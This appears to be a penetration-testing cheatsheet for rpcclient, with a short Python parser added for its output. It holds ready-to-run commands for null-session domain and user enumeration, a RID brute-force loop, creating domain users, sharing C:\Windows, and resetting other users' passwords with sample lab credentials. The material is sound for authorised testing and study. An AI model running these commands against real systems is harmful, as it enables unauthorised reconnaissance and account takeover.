### Commands

```bash
rpcclient -U "" -N <IP>
```

### Query

| **Query** | **Description** |
| ------------------------- | ------------------------------------------------------------------ |
| `srvinfo` | Server information. |
| `enumdomains` | Enumerate all domains that are deployed in the network. |
| `querydominfo` | Provides domain, server, and user information of deployed domains. |
| `netshareenumall` | Enumerates all available shares. |
| `netsharegetinfo <share>` | Provides information about a specific share. |
| `enumdomusers` | Enumerates all domain users. |
| `queryuser <RID>` | Provides information about a specific user. |
| `lookupnames $username` | Resolves a user or group name to its SID. |
| `getdompwinfo` | Shows the domain password policy (minimum length, history, properties). |
| `getusrdompwinfo 1000` | Shows the password policy information that applies to the user with RID 1000. |

### User Enumeration & Group Info

```bash
rpcclient $> enumdomusers
user:[wook] rid:[0x3e8]
rpcclient $> queryuser 0x3e8
rpcclient $> querygroup 0x201
```

### Brute Forcing User RIDs

```bash
# Walk RIDs 500-1100 (built-ins start at 500, created accounts at 1000) and keep only the
# name and RID fields of each queryuser reply.
for i in $(seq 500 1100); do
  rpcclient -N -U "" <IP> -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo ""
done
```

### Brute Forcing User RIDs with [[samrdump.py]]

```bash
samrdump.py <IP>
```

### Create a new user

```bash
rpcclient $> createdomuser $username
# Info level 24 sets the account password.
rpcclient $> setuserinfo2 $username 24 '$newpassword'
```

### Create a new share

```bash
rpcclient $> netshareadd "C:\Windows" "Windows" 10 "Windows Share"
```

### Change a user password

```bash
# 1) From an interactive rpcclient session
rpcclient $> chgpasswd3 $username $oldpass $newpass

# 2) Non-interactively: rpcclient -U domain/user%pwd $IP -c "setuserinfo2 <user> <level> <pwd>"
#    Info level 23 sets the password.
rpcclient -U 'domain/user%pwd' $IP -c "setuserinfo2 MOLLY.SMITH 23 'Password123!'"

# 3) net rpc password to reset the password for a user
net rpc password ewalters "Hacksmarter123!" -U "RSmith%IhateEric2" -S lab.trusted
```
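Added example, not part of the original cheatsheet: a small Python parser for the `enumdomusers` and `queryuser` output formats shown in the user-enumeration and RID brute-force sections above. It converts the hex RIDs to decimal and separates built-in accounts (RID below 1000) from created ones, which is the split the 500-1100 loop walks across; the sample output is constructed, not captured from a real host.

```python
import re

# Constructed sample of "enumdomusers" output (not captured from a real host).
ENUMDOMUSERS_OUTPUT = """\
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[wook] rid:[0x3e8]
user:[svc_backup] rid:[0x451]
"""

# Constructed sample of a "queryuser 0x3e8" reply, trimmed to the fields the grep
# in the RID loop keeps.
QUERYUSER_OUTPUT = """\
    User Name   :   wook
    Full Name   :   Wook
    user_rid :      0x3e8
    group_rid:      0x201
"""

FIRST_USER_RID = 1000  # RIDs below this are well-known built-ins (500 Administrator, 501 Guest, 502 krbtgt)

USER_LINE = re.compile(r"user:\[(?P<name>[^\]]*)\]\s+rid:\[(?P<rid>0x[0-9a-fA-F]+)\]")


def parse_enumdomusers(text):
    """Return {username: rid_as_int} from enumdomusers output."""
    return {m.group("name"): int(m.group("rid"), 16) for m in USER_LINE.finditer(text)}


def parse_queryuser(text):
    """Return the 'key : value' pairs of a queryuser reply; hex RIDs become ints."""
    fields = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, _, value = line.partition(":")  # split on the first colon only
        key, value = key.strip(), value.strip()
        fields[key] = int(value, 16) if value.startswith("0x") else value
    return fields


def classify(users):
    """Split enumerated accounts into built-ins (RID < 1000) and created accounts."""
    builtin = {n: r for n, r in users.items() if r < FIRST_USER_RID}
    created = {n: r for n, r in users.items() if r >= FIRST_USER_RID}
    return builtin, created


if __name__ == "__main__":
    builtin, created = classify(parse_enumdomusers(ENUMDOMUSERS_OUTPUT))
    print("built-in:", builtin)
    print("created :", created)
    print("queryuser:", parse_queryuser(QUERYUSER_OUTPUT))
```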